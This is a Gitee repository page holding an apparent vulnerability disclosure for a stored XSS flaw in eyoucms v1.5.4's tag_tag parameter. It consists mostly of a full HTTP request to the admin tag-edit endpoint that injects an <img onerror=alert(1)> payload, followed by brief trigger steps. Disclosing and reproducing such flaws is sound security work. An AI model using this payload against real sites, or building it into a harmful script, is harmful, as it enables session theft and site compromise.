1 Star 0 Fork 0

wkstestete / cve

加入 Gitee
与超过 1000 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
Eyoucms xss2.md 1.40 KB
一键复制 编辑 Web IDE 原始数据 按行查看 历史
wkstestete 提交于 2023-03-21 07:41 . update xss/Eyoucms xss2.md.

eyoucms v1.5.4 tag_tag parameter has a stored XSS vulnerability

POST /login.php?m=admin&c=Tags&a=edit&_ajax=1&lang=cn HTTP/1.1
Host: www.eyou.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
Origin: http://www.eyou.com
Connection: close
Referer: http://www.eyou.com/login.php?m=admin&c=Tags&a=edit&id=51&lang=cn
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=kc2ot9hcf8c1685heb8bt7k1n0; users_id=1; workspaceParam=switch_map%7CIndex; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

id=51&tag_tag=%3Cimg+src%3D1+onerror%3Dalert(1)%3E&tag_tagold=%3Cimg+src%3D1+onerror%3Dalert(1)%3E&litpic_local=&litpic_remote=&tag_seo_title=&tag_seo_keywords=&tag_seo_description=

Add a tag tag

输入图片说明

Click on the association to trigger XSS

输入图片说明

输入图片说明

1
https://gitee.com/wkstestete/cve.git
git@gitee.com:wkstestete/cve.git
wkstestete
cve
cve
master

搜索帮助